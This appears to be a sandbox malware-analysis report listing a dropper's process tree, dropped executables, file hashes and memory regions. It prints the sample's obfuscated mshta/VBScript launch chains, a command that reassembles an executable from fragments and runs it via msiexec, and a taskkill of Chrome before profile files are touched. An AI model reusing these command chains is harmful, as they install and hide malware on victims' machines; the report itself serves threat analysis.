C:\Windows\system32\cmd.exe /c Tue1993b3f72c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue193858933525b62.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19150ee2be694c8a4.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue192762f1cd058ddf8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19411ac950924ec3f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c78ded4d176ac.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c1338f41ab.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19761b3b8d9d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19b4ef3b53293fe.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1969586bcbf58493.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c06f159e0ec.exe
Tue19c06f159e0ec.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe
Tue19b4ef3b53293fe.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe
Tue19c1338f41ab.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19325eb008c0b950.exe
Tue19325eb008c0b950.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe
Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue192762f1cd058ddf8.exe
Tue192762f1cd058ddf8.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c78ded4d176ac.exe
Tue19c78ded4d176ac.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe
Tue19761b3b8d9d.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1460 -ip 1460
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1969586bcbf58493.exe
Tue1969586bcbf58493.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1993b3f72c.exe
Tue1993b3f72c.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe
Tue19879c4c0e.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19150ee2be694c8a4.exe
Tue19150ee2be694c8a4.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe
Tue193858933525b62.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19411ac950924ec3f.exe
Tue19411ac950924ec3f.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe
Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\is-8JCES.tmp\Tue19879c4c0e.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8JCES.tmp\Tue19879c4c0e.tmp" /SL5="$70220,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 632
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe
"C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe") do taskkill -iM "%~nXx" /f
C:\Users\Admin\AppData\Local\Temp\is-4EH6A.tmp\Tue19879c4c0e.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4EH6A.tmp\Tue19879c4c0e.tmp" /SL5="$6023A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe
~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3332 -ip 3332
C:\Windows\SysWOW64\taskkill.exe
taskkill -iM "Tue193858933525b62.exe" /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3332 -s 360
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE (cREatEObjEcT ( "wscript.sHeLl" ).Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+ y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 ,TruE ) )
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E &Start msiexec -Y .\bENCc.E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"
C:\Windows\SysWOW64\msiexec.exe
msiexec -Y .\bENCc.E
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff9fec6cc40,0x7ff9fec6cc4c,0x7ff9fec6cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1904 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2412 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2436 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3160 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3280,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3292 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4552,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4508 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3688,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4716 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4476,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4840 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4984,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4992 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4732,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4728 /prefetch:8
C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 8daacf5718a3a2b07d13512e330086bd YPWomczBPkCLgTIkGFcoPg.0.1.0.0.0
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4800,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5168 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4904 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5260,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5268 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5416,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5196 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5572,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5588 /prefetch:2
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4600 -ip 4600
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 1204
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3744,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3892 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3516,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3456 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3972,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3512 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3444,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3900 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3892,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3468 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=2008,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3980 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=3912,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3448 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=1928,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1992 /prefetch:2
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4600 -ip 4600
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 1552
Network
Files
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\libwinpthread-1.dll
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\libcurl.dll
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\libstdc++-6.dll
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\libgcc_s_dw2-1.dll
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\libcurlpp.dll
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19150ee2be694c8a4.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1993b3f72c.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c06f159e0ec.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1969586bcbf58493.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c78ded4d176ac.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19411ac950924ec3f.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue192762f1cd058ddf8.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19325eb008c0b950.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe
C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\is-8JCES.tmp\Tue19879c4c0e.tmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ogspjjud.lh5.ps1
C:\Users\Admin\AppData\Local\Temp\is-ETQOM.tmp\idp.dll
C:\Users\Admin\AppData\Local\Temp\is-OTIBH.tmp\_isetup\_shfoldr.dll
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Tue19761b3b8d9d.exe.log
| MD5 | e5352797047ad2c91b83e933b24fbc4f |
| SHA1 | 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772 |
| SHA256 | b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c |
| SHA512 | dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827 |
memory/2324-259-0x0000000000400000-0x0000000000422000-memory.dmp
memory/4504-256-0x0000000006FD0000-0x0000000006FDE000-memory.dmp
memory/4504-260-0x0000000006FE0000-0x0000000006FF4000-memory.dmp
memory/4504-261-0x00000000070D0000-0x00000000070EA000-memory.dmp
memory/4504-272-0x00000000070C0000-0x00000000070C8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2865daf321b26ca00970bb539720d61f |
| SHA1 | 875194d6dbd5b40f3c406a13bd997d5ab6e8b721 |
| SHA256 | b2323989341a0892f7e0eab89ebe55b43170387276eea78c54666e19d48314b4 |
| SHA512 | f3bad9cc02782540f76a339d2d709532c314d1bf640d2c2bc5d7b84f650cf894e79e6e20189f0efc74319a9af6d93167b92d7655ba7be0b7a253c0a08cc89503 |
C:\Users\Admin\AppData\Local\Temp\F3U_R.J
| MD5 | ac6ad5d9b99757c3a878f2d275ace198 |
| SHA1 | 439baa1b33514fb81632aaf44d16a9378c5664fc |
| SHA256 | 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d |
| SHA512 | bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b |
memory/528-281-0x0000000000400000-0x00000000016FB000-memory.dmp
memory/3956-282-0x000000001B1B0000-0x000000001B2B2000-memory.dmp
memory/4628-283-0x0000000000400000-0x0000000002F29000-memory.dmp
memory/3340-297-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/2092-296-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4600-309-0x0000000002F20000-0x0000000002FC5000-memory.dmp
memory/4600-315-0x0000000002FE0000-0x0000000003072000-memory.dmp
memory/4600-312-0x0000000002FE0000-0x0000000003072000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
memory/4600-326-0x0000000000400000-0x00000000005F0000-memory.dmp
memory/4628-328-0x0000000000400000-0x0000000002F29000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 7e0273bd7648f4e550c335ade6197814 |
| SHA1 | 8fa8973be4eacf5d8c609f91ead0339211307a47 |
| SHA256 | 4ea9e9feaf6f25e70b873217c629f607b40775e1dd5d0b33e3d53387d43f6b9e |
| SHA512 | 4b893cf514cfcb52c807745c782525c7ea4ec86316f24eece53769e29d7e38d1143e64ae199fd7eb098302ac81a992caea568c9ad5b90b236d624a51af2b4af1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c3820c81ec1b128434c23227b7f67b7e |
| SHA1 | 110f7dc0a314549ddd1d2f0ae1212c31221a53a4 |
| SHA256 | 398ded4236eed133199790229feca6a8c95f03f5c4eea12c244d01537163f7a7 |
| SHA512 | 84e844106da4ca0f71c01f1f8adfbacb5f7edfa7206d2b90a2b1d8c91e72d274b198543d6390a1dfe80cea192270be61b644a33d56a7d69da2ca52f01a7a0750 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\1bcbe15f-c4c2-4c3d-8417-f0c28db054b1.tmp
| MD5 | 6bf32e36ff9edc37cd2e124b33e9b175 |
| SHA1 | 21ba1532eb1a4365834576c2ed0621ee59a7114f |
| SHA256 | 42d89ba94767d31e54326fc4da5f64c47064f49c4615d5c8b062a4d30daec1d5 |
| SHA512 | 92d83530ff7508dee7c53c335d4977dbd543af9a3526e7ea3539961abde88664285c59316f47982a80fbc0b6ff8db1583eb91cf198c90786113a066291d15700 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | f9e69a2fcdf7fd37d80a169ce351e5a4 |
| SHA1 | c025a2a9fbf35d90e4a5fa47c837a06f67ce7490 |
| SHA256 | f86a0d466c66bef3bafc3a8814570e0da1aaa0079532ed48236c135454d3cd66 |
| SHA512 | 98f8cff15b5a74d7d83471b7d8fbb8dcf3db8f13abbf21963bc7a8372f1a839e858511c5ab2a017a66e8203f17c638dc2f423e3a59582943b3aab51e741b0a0d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 9e1b05594189760513e337b54060abd4 |
